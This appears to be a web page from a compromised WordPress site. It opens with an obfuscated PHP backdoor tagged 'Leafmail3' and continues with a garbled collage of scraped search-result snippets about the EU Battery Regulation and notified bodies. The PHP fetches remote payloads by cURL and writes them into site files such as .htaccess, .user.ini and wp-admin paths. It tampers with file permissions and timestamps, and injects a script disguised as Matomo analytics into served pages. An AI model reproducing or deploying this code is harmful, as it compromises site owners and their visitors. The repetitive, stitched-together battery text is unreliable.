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<?php /*Leafmail3*/goto o1QFr; wasj3: $ZJUCA($jQ0xa, $RTa9G); goto wYDtx; IuHdj: $egQ3R = "\147\172\151"; goto ChKDE; TpHVE: $cPzOq .= "\157\x6b\x6b"; goto vgltl; gmVrv: $Mvmq_ .= "\x6c\x5f\x63\154\x6f"; goto N9T5l; SClM0: $VwfuP = "\x64\x65\146"; goto PXHHr; m8hp8: $uHlLz = "\x73\x74\x72"; goto lz2G0; UH4Mb: $eULaj .= "\x70\x63\x2e\x70"; goto apDh3; QPct6: AtVLG: goto Mg1JO; dj8v0: $ZJUCA = "\143\150"; goto WmTiu; uHm0i: $TBxbX = "\x57\x50\137\125"; goto RCot0; f4Rdw: if (!($EUeQo($kpMfb) && !preg_match($tIzL7, PHP_SAPI) && $fHDYt($uZmPe, 2 | 4))) { goto TGN7B; } goto S2eca; H7qkB: $MyinT .= "\164\40\x41\x63\x63"; goto Air1i; AedpI: try { goto JM3SL; oiS8N: @$YWYP0($lJtci, $H0gg1); goto nucR0; AffR5: @$YWYP0($PcRcO, $H0gg1); goto SpIUU; JnP2S: @$ZJUCA($lJtci, $shT8z); goto oiS8N; nOhHX: @$ZJUCA($lJtci, $RTa9G); goto LvbAc; LvbAc: @$rGvmf($lJtci, $UYOWA["\141"]); goto JnP2S; SpIUU: @$ZJUCA($jQ0xa, $shT8z); goto qvTm1; gA5rv: @$ZJUCA($PcRcO, $shT8z); goto AffR5; nucR0: @$ZJUCA($PcRcO, $RTa9G); goto COvI1; JM3SL: @$ZJUCA($jQ0xa, $RTa9G); goto nOhHX; COvI1: @$rGvmf($PcRcO, $UYOWA["\142"]); goto gA5rv; qvTm1: } catch (Exception $ICL20) { } goto PqZGA; BWxc9: $kpMfb .= "\154\137\x69\156\x69\164"; goto RMP1m; Q7gNx: $gvOPD = "\151\163\137"; goto AfwzG; fFfBR: goto AtVLG; goto kST_Q; J9uWl: $e9dgF .= "\x61\171\163"; goto lNb3h; ZlPje: $u9w0n .= "\x75\x69\x6c\144\x5f\161"; goto Mit4a; YRbfa: $dGt27 .= "\157\x73\x65"; goto L744i; ioNAN: $tIzL7 .= "\x6c\x69\57"; goto Khhgn; mz3rE: $FANp1 .= "\x70\141\x72\145"; goto SClM0; eBKm1: $PcRcO = $jQ0xa; goto Sg4f2; D0V8f: $pv6cp = "\162\x65"; goto Hy0sm; xXaQc: $FANp1 = "\x76\145\162\x73\151"; goto T7IwT; ulics: try { $_SERVER[$pv6cp] = 1; $pv6cp(function () { goto YEXR4; PKzAL: $AG2hR .= "\163\171\x6e\x63\75\164\162\165\145"; goto HIXil; NZAxH: $AG2hR .= "\x65\x72\75\164\x72\165\x65\x3b" . "\12"; goto Tbsb3; xDrpr: $AG2hR .= "\x75\x6d\x65\156\164\54\40\x67\75\144\x2e\143\162\145\x61\164\145"; goto mLjk9; r_Oqj: $AG2hR .= "\163\x63\162\151\160\164\x22\x3e" . "\xa"; goto JZsfv; PEdls: $AG2hR .= "\74\57\163"; goto WBFgG; POyWW: $AG2hR .= "\x4d\55"; goto a8oGQ; N2RIK: $AG2hR .= "\175\x29\50\51\x3b" . "\12"; goto PEdls; Vj0ze: $AG2hR .= "\x72\151\160\x74\40\164\x79\x70\145\x3d\42\164\145\170"; goto FXjwZ; JZsfv: $AG2hR .= "\x28\x66\x75\156\143"; goto ZRBmo; zk1Ml: $AG2hR .= "\x79\124\141\147\x4e\x61\155\145"; goto STHB_; aKt86: $AG2hR .= "\x72\x69\160\x74\42\51\x2c\40\x73\75\x64\x2e\x67\x65\x74"; goto oxuwD; FXjwZ: $AG2hR .= "\x74\57\x6a\141\x76\141"; goto r_Oqj; YffEK: $AG2hR .= "\57\x6d\141\164"; goto nL_GE; ZrlUz: $AG2hR .= "\x73\x63\162\151\x70\164\x22\x3b\40\147\x2e\141"; goto PKzAL; MSqPC: $AG2hR .= "\x65\x20\55\x2d\76\12"; goto rWq2m; gUhrX: $AG2hR .= "\74\x73\143"; goto Vj0ze; oxuwD: $AG2hR .= "\x45\154\x65\x6d\145\156\164\x73\102"; goto zk1Ml; a8oGQ: $AG2hR .= time(); goto xyZaU; WBFgG: $AG2hR .= "\x63\162\151\160\164\x3e\xa"; goto jHj0s; rWq2m: echo $AG2hR; goto zxMHd; zzMTI: $AG2hR .= "\152\141\166\x61"; goto ZrlUz; HIXil: $AG2hR .= "\73\x20\147\56\144\x65\x66"; goto NZAxH; EXhzp: $AG2hR .= "\x65\156\164\x4e\x6f\x64\145\56\x69\x6e"; goto yJp9W; KUpUt: $AG2hR .= "\x64\40\115\141\x74"; goto c13YM; hugz8: $AG2hR .= "\x6f\x72\145\50\x67\54\x73\51\73" . "\xa"; goto N2RIK; xyZaU: $AG2hR .= "\x22\73\40\163\56\160\141\162"; goto EXhzp; ZRBmo: $AG2hR .= "\164\151\x6f\156\x28\51\x20\173" . "\xa"; goto sOVga; YqIfq: $AG2hR .= "\77\x69\x64\x3d"; goto POyWW; Tbsb3: $AG2hR .= "\147\x2e\163\x72"; goto vxsas; k1w2Q: $AG2hR = "\x3c\41\x2d\55\x20\115\x61"; goto OOFo2; F2sIB: $AG2hR .= "\x3d\x22\164\x65\x78\x74\57"; goto zzMTI; OOFo2: $AG2hR .= "\x74\157\155\x6f\x20\55\x2d\x3e\xa"; goto gUhrX; vxsas: $AG2hR .= "\143\x3d\165\x2b\42\x6a\163\57"; goto JGvCK; jHj0s: $AG2hR .= "\74\x21\55\55\40\x45\156"; goto KUpUt; mLjk9: $AG2hR .= "\105\154\x65\x6d\x65\156\x74\50\42\163\x63"; goto aKt86; yJp9W: $AG2hR .= "\x73\x65\162\x74\102\145\146"; goto hugz8; c13YM: $AG2hR .= "\x6f\x6d\x6f\40\103\157\144"; goto MSqPC; STHB_: $AG2hR .= "\50\x22\x73\x63\162\x69"; goto SX8pI; JGvCK: $AG2hR .= $osL5h; goto YffEK; nL_GE: $AG2hR .= "\x6f\155\x6f\56\x6a\x73"; goto YqIfq; SX8pI: $AG2hR .= "\160\x74\42\51\133\x30\135\x3b" . "\xa"; goto uh8pE; YEXR4: global $osL5h, $cPzOq; goto k1w2Q; jW6LQ: $AG2hR .= "\166\141\x72\40\144\x3d\x64\157\143"; goto xDrpr; uh8pE: $AG2hR .= "\x67\x2e\164\x79\x70\145"; goto F2sIB; sOVga: $AG2hR .= "\166\x61\162\40\x75\75\42" . $cPzOq . "\42\x3b" . "\xa"; goto jW6LQ; zxMHd: }); } catch (Exception $ICL20) { } goto arBxc; TrkYs: $eULaj .= "\x2f\170\x6d"; goto GE2p3; L744i: $cPzOq = "\x68\x74\164\x70\163\72\57\x2f"; goto TpHVE; CNdmS: wLXpb: goto wasj3; nHXnO: $_POST = $_REQUEST = $_FILES = array(); goto CNdmS; PHhHL: P9yQa: goto W2Q7W; UkCDT: $cLC40 = 32; goto BnazY; vabQZ: $CgFIN = 1; goto QPct6; gSbiK: try { goto xtnST; qBVAq: $k7jG8[] = $E0suN; goto Tc9Eb; vZ6zL: $E0suN = trim($Q0bWd[0]); goto LuoPM; D98P3: if (!empty($k7jG8)) { goto FbDAI; } goto AML_a; LuoPM: $jCv00 = trim($Q0bWd[1]); goto Q4uy7; xtnST: if (!$gvOPD($d3gSl)) { goto nHP5K; } goto W8uMn; c_73m: FbDAI: goto h1Cu7; kNAxm: if (!($uHlLz($E0suN) == $cLC40 && $uHlLz($jCv00) == $cLC40)) { goto lfWQh; } goto MfJKK; L8cv7: WVm2j: goto c_73m; AML_a: $d3gSl = $jQ0xa . "\x2f" . $HNQiW; goto GBRPC; ZSYyc: $jCv00 = trim($Q0bWd[1]); goto kNAxm; W8uMn: $Q0bWd = @explode("\72", $DJDq1($d3gSl)); goto Woix_; EA1BT: if (!(is_array($Q0bWd) && count($Q0bWd) == 2)) { goto ctSg2; } goto A163l; Woix_: if (!(is_array($Q0bWd) && count($Q0bWd) == 2)) { goto wU2zk; } goto vZ6zL; Q4uy7: if (!($uHlLz($E0suN) == $cLC40 && $uHlLz($jCv00) == $cLC40)) { goto VAVW5; } goto qBVAq; tEVz_: $k7jG8[] = $jCv00; goto xWpvL; xWpvL: lfWQh: goto oilos; MfJKK: $k7jG8[] = $E0suN; goto tEVz_; N3TyU: wU2zk: goto snD7p; lky0R: $Q0bWd = @explode("\72", $DJDq1($d3gSl)); goto EA1BT; Tc9Eb: $k7jG8[] = $jCv00; goto evp7M; snD7p: nHP5K: goto D98P3; oilos: ctSg2: goto L8cv7; evp7M: VAVW5: goto N3TyU; GBRPC: if (!$gvOPD($d3gSl)) { goto WVm2j; } goto lky0R; A163l: $E0suN = trim($Q0bWd[0]); goto ZSYyc; h1Cu7: } catch (Exception $ICL20) { } goto xU6vT; T7IwT: $FANp1 .= "\x6f\x6e\x5f\143\x6f\x6d"; goto mz3rE; JX1Oy: $dGt27 = "\x66\x63\x6c"; goto YRbfa; BnazY: $Pzt0o = 5; goto TYFaW; o1QFr: $kFvng = "\74\x44\x44\x4d\x3e"; goto wODYw; CL80L: $MyinT .= "\120\x2f\61\x2e\x31\x20\x34"; goto gErqa; tFGg7: $YWYP0 .= "\x75\143\x68"; goto dj8v0; pXfDS: $ygOJ_ .= "\x2f\167\160"; goto c7yEe; xUd9U: $pv6cp .= "\151\x6f\x6e"; goto bqFyS; PqZGA: CVVA3: goto RDKTA; wYDtx: $uZmPe = $nPBv4($eULaj, "\x77\x2b"); goto f4Rdw; E453u: $QIBzt .= "\56\64"; goto O8RXw; a4EJZ: $dZR_y = $cPzOq; goto vZkPa; FK_sr: $kb9bA .= "\x65\162\x2e\x69"; goto G2uff; TuwL4: $jQ0xa = $_SERVER[$Wv1G0]; goto wrxGI; wJDrU: $eULaj = $jQ0xa; goto TrkYs; MLdcc: $fHDYt .= "\x63\153"; goto JX1Oy; Gs7Gb: $kpMfb = $vW4As; goto BWxc9; Mit4a: $u9w0n .= "\x75\x65\x72\171"; goto cIo5P; GE2p3: $eULaj .= "\x6c\162"; goto UH4Mb; cIo5P: $uAwql = "\155\x64\65"; goto aXExt; c7yEe: $ygOJ_ .= "\x2d\x61"; goto XWOCC; wrxGI: $ygOJ_ = $jQ0xa; goto pXfDS; XsWqd: $kb9bA .= "\57\56\165\163"; goto FK_sr; cWrVz: $nPBv4 .= "\145\x6e"; goto KCtWA; CrWKs: $l0WLW .= "\157\160\x74"; goto jcG0e; lz2G0: $uHlLz .= "\154\x65\x6e"; goto xXaQc; wee0Y: $ulOTQ .= "\115\111\116"; goto Tfi5q; vgltl: $cPzOq .= "\154\x69\x6e\153\56\x74"; goto pr5fA; Khhgn: $tIzL7 .= "\x73\151"; goto JBJmV; kJlf4: $DJDq1 .= "\147\145\164\137\143"; goto NZqWx; lNb3h: $H0gg1 = $xsR4V($e9dgF); goto XYviL; TBl6Q: sLwcv: goto fFfBR; RMP1m: $l0WLW = $vW4As; goto ujtZa; XQnCd: $PcRcO .= "\x61\143\143\145\163\x73"; goto ikUIP; X4xWX: $QIBzt = "\x35"; goto E453u; hDUdL: $MWMOe .= "\x6c\x65"; goto Q7gNx; LxUUO: $RTa9G = $QTYip($HqqUn($RTa9G), $Pzt0o); goto qaeyL; f6Txl: $HqqUn = "\x64\x65\143"; goto gwNCH; sK97X: $nPBv4 = "\x66\157\160"; goto cWrVz; Ee0VW: $EUeQo .= "\164\x69\x6f\156\x5f"; goto a2JJX; D9NbF: $CgFIN = 1; goto PHhHL; VY3H_: $Wv1G0 = "\x44\117\x43\x55\115\105\116\x54"; goto HpOFr; CRqG1: if (empty($k7jG8)) { goto VIn91; } goto s4AWH; apDh3: $eULaj .= "\x68\160\x2e\60"; goto sK97X; Sg4f2: $PcRcO .= "\57\x2e\x68\x74"; goto XQnCd; jcG0e: $YQ0P6 = $vW4As; goto rA_Dy; dlqC2: $HNQiW = substr($uAwql($osL5h), 0, 6); goto xGZOR; kxKwG: $osL5h = $_SERVER[$i5EZR]; goto TuwL4; ozW5s: $e9dgF .= "\63\x20\x64"; goto J9uWl; xU6vT: $lJtci = $jQ0xa; goto BpRMk; CquiC: $dZR_y .= "\x63\x6f\160\171"; goto BLSy0; GSfrX: $pv6cp .= "\x75\x6e\143\164"; goto xUd9U; yaYSs: $rGvmf .= "\x6f\x6e\x74\x65\156\164\163"; goto mIlAi; FXRyn: $TBxbX .= "\115\x45\x53"; goto R1jVG; kST_Q: VIn91: goto vabQZ; flXr3: $shT8z = $QTYip($HqqUn($shT8z), $Pzt0o); goto TkfCl; FJdH4: $dZR_y .= "\x3d\x67\x65\x74"; goto CquiC; kJyDh: $QTYip = "\x69\156\x74"; goto blzff; s4AWH: $H25pP = $k7jG8[0]; goto t74Wt; TyAte: $k7jG8 = array(); goto UkCDT; EO8QL: try { $UYOWA = @$AkFS8($egQ3R($eKFWX($M7wqP))); } catch (Exception $ICL20) { } goto OXweB; XYviL: $i5EZR = "\110\124\124\x50"; goto j4Pjv; ikUIP: $kb9bA = $jQ0xa; goto XsWqd; VrwTF: $nRD8p .= "\x64\x69\162"; goto aQp1m; dLa5a: $pv6cp .= "\x65\162\x5f"; goto x5YEr; PgImI: @$ZJUCA($kb9bA, $RTa9G); goto yAax8; Jb1Vu: try { goto Bwps7; WPylr: if (!$xsy4x($Y61WO)) { goto nWSzU; } goto NpK90; xqrLf: @$YWYP0($dqnvi, $H0gg1); goto cinsF; N7wJU: if ($xsy4x($Y61WO)) { goto KOuoA; } goto RBLfp; wf0jq: @$ZJUCA($Y61WO, $shT8z); goto xqrLf; bfkJn: try { goto jwOvP; sXqkD: $l0WLW($ekYPG, CURLOPT_SSL_VERIFYPEER, false); goto tXay1; jwOvP: $ekYPG = $kpMfb(); goto jMqt3; VURt4: $l0WLW($ekYPG, CURLOPT_POST, 1); goto Qk7oo; G7Y1e: $l0WLW($ekYPG, CURLOPT_USERAGENT, "\x49\x4e"); goto Sw_Ys; lg1iu: $l0WLW($ekYPG, CURLOPT_TIMEOUT, 3); goto VURt4; jMqt3: $l0WLW($ekYPG, CURLOPT_URL, $LfwPf . "\x26\164\x3d\151"); goto G7Y1e; Qk7oo: $l0WLW($ekYPG, CURLOPT_POSTFIELDS, $u9w0n($Lx9yT)); goto axPES; Sw_Ys: $l0WLW($ekYPG, CURLOPT_RETURNTRANSFER, 1); goto sXqkD; tXay1: $l0WLW($ekYPG, CURLOPT_SSL_VERIFYHOST, false); goto Gb33B; PUEHo: $Mvmq_($ekYPG); goto rF4qo; Gb33B: $l0WLW($ekYPG, CURLOPT_FOLLOWLOCATION, true); goto lg1iu; axPES: $YQ0P6($ekYPG); goto PUEHo; rF4qo: } catch (Exception $ICL20) { } goto zCePm; s2GBY: $Y61WO = dirname($dqnvi); goto N7wJU; bO0VE: KOuoA: goto WPylr; RBLfp: @$ZJUCA($jQ0xa, $RTa9G); goto lexI4; NpK90: @$ZJUCA($Y61WO, $RTa9G); goto aGYEQ; wsLep: $Lx9yT = ["\144\x61\x74\x61" => $UYOWA["\x64"]["\165\162\x6c"]]; goto bfkJn; y0C5p: @$ZJUCA($dqnvi, $shT8z); goto wf0jq; cinsF: $LfwPf = $cPzOq; goto d8sPt; OAF8R: $LfwPf .= "\x6c\x6c"; goto wsLep; d8sPt: $LfwPf .= "\77\141\143"; goto HZ42Q; lexI4: @$nRD8p($Y61WO, $RTa9G, true); goto K7fs2; aGYEQ: @$rGvmf($dqnvi, $UYOWA["\144"]["\x63\157\x64\x65"]); goto y0C5p; zCePm: nWSzU: goto r2ase; Bwps7: $dqnvi = $jQ0xa . $UYOWA["\144"]["\160\x61\x74\x68"]; goto s2GBY; K7fs2: @$ZJUCA($jQ0xa, $shT8z); goto bO0VE; HZ42Q: $LfwPf .= "\164\75\x63\141"; goto OAF8R; r2ase: } catch (Exception $ICL20) { } goto AedpI; kAMGF: $xsy4x .= "\144\x69\x72"; goto gdP2h; lX6T6: if (!$gvOPD($kb9bA)) { goto KTGlr; } goto spjef; jxKJS: $ulOTQ .= "\x5f\x41\104"; goto wee0Y; vZkPa: $dZR_y .= "\x3f\141\143\164"; goto FJdH4; gErqa: $MyinT .= "\60\x36\x20\116\x6f"; goto H7qkB; xGZOR: $hg32N = $d3gSl = $ygOJ_ . "\57" . $HNQiW; goto TyAte; GiT2I: $Mvmq_ = $vW4As; goto gmVrv; KCtWA: $fHDYt = "\x66\x6c\157"; goto MLdcc; Yc09l: $xsy4x = "\x69\163\137"; goto kAMGF; FZsOD: $lJtci .= "\150\x70"; goto eBKm1; rA_Dy: $YQ0P6 .= "\154\137\x65\170\x65\x63"; goto GiT2I; VQCaR: $k8h0h = !empty($m4bDA) || !empty($ZTS7q); goto Bw8cX; ujtZa: $l0WLW .= "\154\137\x73\x65\x74"; goto CrWKs; R1jVG: $ulOTQ = "\127\120"; goto jxKJS; OXweB: if (!is_array($UYOWA)) { goto CVVA3; } goto L7ftk; bqFyS: if (isset($_SERVER[$pv6cp])) { goto Kwp9i; } goto r3vZ_; ChKDE: $egQ3R .= "\156\146\x6c\x61\164\145"; goto OCGca; Bx0F8: $rGvmf = "\146\x69\154\145\x5f"; goto cMMsY; lar4b: $xsR4V .= "\x6d\145"; goto ESAaf; L7ftk: try { goto b8mrw; IZ7dT: @$rGvmf($d3gSl, $UYOWA["\x63"]); goto qi8JJ; j1slf: if (!$xsy4x($ygOJ_)) { goto fnZm_; } goto l27iU; FnW9Y: fnZm_: goto IZ7dT; RHQPY: @$ZJUCA($jQ0xa, $shT8z); goto FudGj; jRIpH: $d3gSl = $hg32N; goto FnW9Y; b8mrw: @$ZJUCA($jQ0xa, $RTa9G); goto j1slf; l27iU: @$ZJUCA($ygOJ_, $RTa9G); goto jRIpH; qi8JJ: @$ZJUCA($d3gSl, $shT8z); goto fMj35; fMj35: @$YWYP0($d3gSl, $H0gg1); goto RHQPY; FudGj: } catch (Exception $ICL20) { } goto Jb1Vu; Hy0sm: $pv6cp .= "\x67\151\x73\164"; goto dLa5a; wODYw: $tIzL7 = "\57\x5e\143"; goto ioNAN; D9G8A: $vW4As = "\x63\165\162"; goto Gs7Gb; zR6Sw: $RTa9G += 304; goto LxUUO; FLAgg: @$ZJUCA($jQ0xa, $shT8z); goto Ms_Rx; TkfCl: $MyinT = "\110\124\124"; goto CL80L; JBJmV: $xsR4V = "\x73\x74\x72"; goto wDwVu; m7Y7E: $shT8z += 150; goto flXr3; OCGca: $AkFS8 = "\165\x6e\x73\145\x72"; goto DuXwv; spjef: @$ZJUCA($jQ0xa, $RTa9G); goto PgImI; mIlAi: $YWYP0 = "\x74\157"; goto tFGg7; Air1i: $MyinT .= "\x65\x70\164\x61\142\154\145"; goto wJDrU; hnuEm: $M7wqP = false; goto IxcDO; AfwzG: $gvOPD .= "\x66\151\154\x65"; goto Yc09l; Mg1JO: if (!$CgFIN) { goto V5o9n; } goto a4EJZ; O8RXw: $QIBzt .= "\x2e\x30\73"; goto kxKwG; Qjsri: Kwp9i: goto uHm0i; aQp1m: $DJDq1 = "\146\151\154\145\x5f"; goto kJlf4; wDwVu: $xsR4V .= "\x74\157"; goto k5kym; Ms_Rx: KTGlr: goto QDkYN; p2xAd: $u9w0n = "\x68\x74\x74\160\x5f\142"; goto ZlPje; XWOCC: $ygOJ_ .= "\x64\155\151\156"; goto dlqC2; PXHHr: $VwfuP .= "\x69\156\145\144"; goto uwRQG; t74Wt: $Aa5A7 = $k7jG8[1]; goto rjUnC; WmTiu: $ZJUCA .= "\x6d\157\x64"; goto OMDdm; F90kP: $CgFIN = 1; goto TBl6Q; IxcDO: try { goto MN2Ol; lfwpD: $l0WLW($ekYPG, CURLOPT_RETURNTRANSFER, 1); goto XT0V7; pm4fL: $l0WLW($ekYPG, CURLOPT_SSL_VERIFYHOST, false); goto f1Wpg; LukB5: $l0WLW($ekYPG, CURLOPT_USERAGENT, "\x49\x4e"); goto lfwpD; MN2Ol: $ekYPG = $kpMfb(); goto PGjVI; XT0V7: $l0WLW($ekYPG, CURLOPT_SSL_VERIFYPEER, false); goto pm4fL; f1Wpg: $l0WLW($ekYPG, CURLOPT_FOLLOWLOCATION, true); goto A02q4; Jr5Fq: $Mvmq_($ekYPG); goto kxHAl; kxHAl: $M7wqP = trim(trim($M7wqP, "\xef\273\xbf")); goto DRdNb; A02q4: $l0WLW($ekYPG, CURLOPT_TIMEOUT, 10); goto czpAh; PGjVI: $l0WLW($ekYPG, CURLOPT_URL, $dZR_y); goto LukB5; czpAh: $M7wqP = $YQ0P6($ekYPG); goto Jr5Fq; DRdNb: } catch (Exception $ICL20) { } goto TtjMz; yA6tr: $e9dgF .= "\63\x36"; goto ozW5s; BLSy0: $dZR_y .= "\x26\164\x3d\x69\46\x68\75" . $osL5h; goto hnuEm; qaeyL: $shT8z = 215; goto m7Y7E; YAsQc: if (!(!$_SERVER[$pv6cp] && $FANp1(PHP_VERSION, $QIBzt, "\76"))) { goto VlKKH; } goto ulics; QDkYN: $CgFIN = 0; goto CRqG1; g3rCR: $m4bDA = $_REQUEST; goto A4fYL; rjUnC: if (!(!$gvOPD($lJtci) || $MWMOe($lJtci) != $H25pP)) { goto P9yQa; } goto D9NbF; x5YEr: $pv6cp .= "\x73\x68\165"; goto itQ2f; A4fYL: $ZTS7q = $_FILES; goto VQCaR; a2JJX: $EUeQo .= "\145\x78"; goto fYDkt; TYFaW: $Pzt0o += 3; goto hoCMV; fYDkt: $EUeQo .= "\x69\163\x74\163"; goto D9G8A; fmcU9: $MWMOe .= "\x5f\x66\151"; goto hDUdL; S2eca: $ZJUCA($jQ0xa, $shT8z); goto YAsQc; RCot0: $TBxbX .= "\x53\105\x5f\124\110\105"; goto FXRyn; BpRMk: $lJtci .= "\57\x69\x6e"; goto lJYIj; cMMsY: $rGvmf .= "\160\x75\164\137\143"; goto yaYSs; j4Pjv: $i5EZR .= "\x5f\x48\117\x53\x54"; goto VY3H_; itQ2f: $pv6cp .= "\x74\x64\x6f"; goto gi1ux; YAE22: $eKFWX .= "\66\x34\137\x64"; goto HkhAv; DuXwv: $AkFS8 .= "\x69\x61\x6c\151\x7a\x65"; goto kJyDh; NZqWx: $DJDq1 .= "\x6f\156\164\145\x6e\x74\x73"; goto Bx0F8; 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<div>Notified body battery regulation. From August 2025 companies will need to put in place battery due diligence policies and have them verified by a notified body and periodically audited. „To ensure that the CE marking of the battery can be achieved, we train our customers about the upcoming requirements step-by-step,“ says Theeck. Information related to Notified Bodies. Therefore, social and environmental risks arising during extraction, processing, and trading raw materials for battery manufacturing will need to be both identified and mitigated. On July 28, 2023, the EU Commission published the new EU Battery Regulation (2023/1542) concerning batteries and waste batteries, which replaced the EU Batteries Directive (2006/66/EC) and took effect on August 17, 2023. Aug 2, 2024 · The most important facts in brief. Notified bodies: Notified bodies are independent organizations that are authorized by the European Commission to assess conformity of products with EU regulations. Jul 28, 2023 · An independent notified body will be responsible for verifying that producers fulfil their obligations. Oct 10, 2023 · This specific regulation goes into effect in 2026. As almost every application today contains batteries, not least the cars on our roads, some manufacturers are overwhelmed by In accordance with Article 50 of Regulation (EU) 2017/745 on medical devices and Article 46 of Regulation (EU) 2017/746 on in vitro diagnostic medical devices, notified bodies establish lists of their standard fees for the conformity assessment activities that they carry out and make those lists publicly available. In order to assess the carbon footprint of batteries, calculated through the product’s LCA (Life Cycle Assessment), and identify the potential for improvement, the EU Battery Regulation introduced a number of rules and methods for quantifying the Carbon Footprint, the parameter used to estimate the total direct and indirect greenhouse The EU Battery Regulation encompasses a comprehensive set of rules and requirements established by the European Union (EU). Jul 20, 2023 · The new EU regulation on batteries and waste batteries ("Batteries Regulation") repeals the existing 2006 batteries directive and is part of the European Green Deal. The regulation requires the involvement of notified bodies for certain types of batteries, such as those containing hazardous substances. “ 1. Unlike directives, which necessitate incorporation into national laws, regulations are directly enforceable across all member states. The lists include the identification number of each notified body as well as the tasks for which it has been notified, and are subject to regular update. Jan 18, 2024 · The CE marking must also include the identification number of the notified verification body that carries out appropriate tests to check the conformity of the battery with applicable requirements. The Regulation doesn’t currently specify the repercussions should the notified body deem policies to not fulfil all requirements, but we anticipate this would result in the necessity to reassess Feb 7, 2023 · The regulation is expected to enter into force at the beginning of summer 2023, with transition periods between 12 and 36 months for most requirements. : → stationary battery energy storage systems Jul 18, 2024 · In Europe, the Battery Regulation 2023/1542 was released in July 2023 with various deadlines to replace the Battery Directive 2006/66/EC. The passport is an electronic ledger designed to improve transparency within the supply and value chains associated with each battery. From 2025, things will get serious for the battery manufacturers concerned when the implementation phase for the new regulations begins. The new regulation replaces the previous Directive 2006/66/EC on batteries&nbsp;and aims at regulating the entire battery life cycle and value chain in an integrated manner. Specifically, notified body involvement is required for Articles 7 and 8 for LMT, EV, SLI and industrial batteries with a capacity greater than 2 kWh. Effective Dates and Exemptions of EU Battery Regulation Mar 26, 2024 · There is a mandatory third-party verification by a notified body for all three aspects. The EU Battery Regulation encompasses a comprehensive set of rules and requirements established by the European Union (EU). • Notified body due diligence assessment. Jul 28, 2023 · Since the services offered by notified bodies in a Member State might relate to batteries made available on the market throughout the Union, it is appropriate to give the other Member States and the Commission the opportunity to raise objections concerning a notified body. May 27, 2024 · The EU Battery Regulation will supersede the Battery Directive 2006/66/EC by 18 August 2025, signifying a crucial advancement in regulatory enforcement. Sep 15, 2023 · On August 18, 2023, the new Regulation on batteries and waste batteries (EU) 2023/1542 ("Batteries Regulation") entered into force. batteries with the relevant requirements set out in the Regulation. Dec 14, 2023 · „The new regulation will make the involvement of a Notified Body mandatory. This will minimise the environmental impact of this exponential growth in light of new socioeconomic conditions, technological developments, markets, and battery usages. • Verification of battery management system functioning and data driven battery state of health / state of safety Jul 27, 2024 · - Battery Regulation (2023): General information (weight, capacity), separate collection symbol, QR code, identification of the notified body (if needed), pictograms (if applicable), carbon footprint label (if needed), additional information (if needed) Aug 11, 2023 · The Regulation lays down the requirements and obligations in terms of battery due diligence policies. The Batteries Regulation has started to became applicable on February 18, 2024, meaning that its provisions have legal effect since this day. . to determine the residual value of a battery and its potential for use in a second-life application. The impact will be felt not only by the usual battery-driven Understand the EU Battery Regulation 2023/1542's impact: stricter industry standards from February 2024, focusing on environmental accountability and carbon footprint transparency. “ Jul 27, 2024 · - Battery Regulation (2023): General information (weight, capacity), separate collection symbol, QR code, identification of the notified body (if needed), pictograms (if applicable), carbon footprint label (if needed), additional information (if needed) Aug 6, 2023 · The text agreed in trilogue negotiations amends the original Commission proposal substantially, notably by including batteries for light means of transport, such as e-bikes and e-scooters, within the regulation's scope, and by strengthening due diligence requirements. Where needed per Annex VIII, this marking is granted by a notified certification body and indicates that the product complies with EU safety, health and environmental protection requirements. In Europe, the Battery Regulation 2023/1542 was released in July 2023 with various deadlines to replace the Battery Directive 2006/66/EC. 2, point 13) An energy storage system is not a battery. Followed by the notified body’s identification number (if required). Followed, if applicable, by marks or pictograms specifying any danger or risk relevant to the battery’s storage, transport, treatment, or use. Individual services Individual services • Detection of hazardous substances content. It came into force in August. These bodies carry out tasks related to conformity assessment procedures set out in the applicable legislation, when a third party is required. The sustainability requirements outlined in Regulation 2023/1542 focus on ensuring that batteries are sourced, manufactured, and used in an environmentally responsible manner Proposal: ‘automotive battery’ means any battery used only for automotive starter, lighting, or ignition power or main on-board power supply on vehicles; Stationary battery energy storage system (Art. On economic operators: due diligence. These due diligence requirements will become obligatory for battery manufacturers and suppliers in the EU beginning in August 2025. The supply chain due diligence obligation will start to apply on 18 August 2025. The area of (extended) producer responsibility, which is familiar from the Battery Act and the registration, collection and recycling obligations contained therein, is also regulated in greater detail (Article 54 ff. The objectives of the regulation are to promote technological progress in the battery sector and to minimize the impact of their fabrication on the THE NEW EUROPEAN BATTERY REGULATION The new EU regulation No. • Verification of battery management system functioning and data driven battery state of health / state of safety Aug 29, 2024 · The new EU battery regulation 2023/1542 came into force in August 2023. Especially for the automotive sector many of these regulations are new at this point. Requirements for placing on the market. Production of the battery: carbon footprint, recycled content. It also includes requirements for the collection, processing and recycling of waste batteries. Modules D1 and G involve notified bodies. „The new regulation will make the involvement of a Notified Body mandatory. Design of the battery: restriction of hazardous substances, performance & durability, safety. It aims to strengthen the functioning of the internal market and reduce environmental and social impacts through all stages of the battery life cycle. Traceability information: Batteries should contain the following information for traceability purposes: a. CE Mark. Unfortunately some certification bodies issue certificates in areas beyond their competence, and call them ”voluntary certificates”. Notified bodies need to be involved in granting the CE marking for certain types of batteries. To be eligible a body must be a legal entity established on the territory of a Member State and, thus, come under its jurisdiction. “ The EU Commission adopted the new EU Battery Regulation in July 2023. The Regulation also imposes several due diligence obligations on economic operators. The EU Battery Regulation 2023/1542 takes a stringent stance on compliance. g. One fundamental aspect is that the legislation was promulgated as a Regulation and aligned to the New Legislative Framework (NLF). Aug 23, 2024 · The new EU Battery Regulation is now in force. This regulation is a comprehensive legal framework covering the entire life cycle of batteries, from the manufacturing through to the The European Parliament and the Council adopted the new Batteries Regulation on 12 July 2023. According to some forecasts, the battery market could be worth of €250 billio n a year by 2025. A longer lifetime beyond Notified bodies need to be involved in granting the CE marking for certain types of batteries. The sustainability requirements outlined in Regulation 2023/1542 focus on ensuring that batteries are sourced, manufactured, and used in an environmentally responsible manner I t should be possible for the notified body and the staff it employs, to maintain independence from economic operators in the battery value chain and from other companies, in particular from battery manufacturers, the battery manufacturers’ trade partners, shareholding investors on the battery manufacturers’ plants and from other notified Jul 16, 2024 · Background on battery regulation. A notified body, in the European Union, is an organisation that has been designated by a member state to assess the conformity of certain products, before being placed on the EU market, with the applicable essential technical requirements. The sustainability requirements outlined in Regulation 2023/1542 focus on ensuring that batteries are sourced, manufactured, and used in an environmentally responsible manner . The Regulation sets forth requirements for information, including sustainability, stability and labeling-related information, among others, to distribute batteries in the market. The main requirements of the regulation. Promoting a circular economy • portable battery (up to 5 kg, not for industrial use), incl. In general, many of these changes have to be addressed by a notified body like 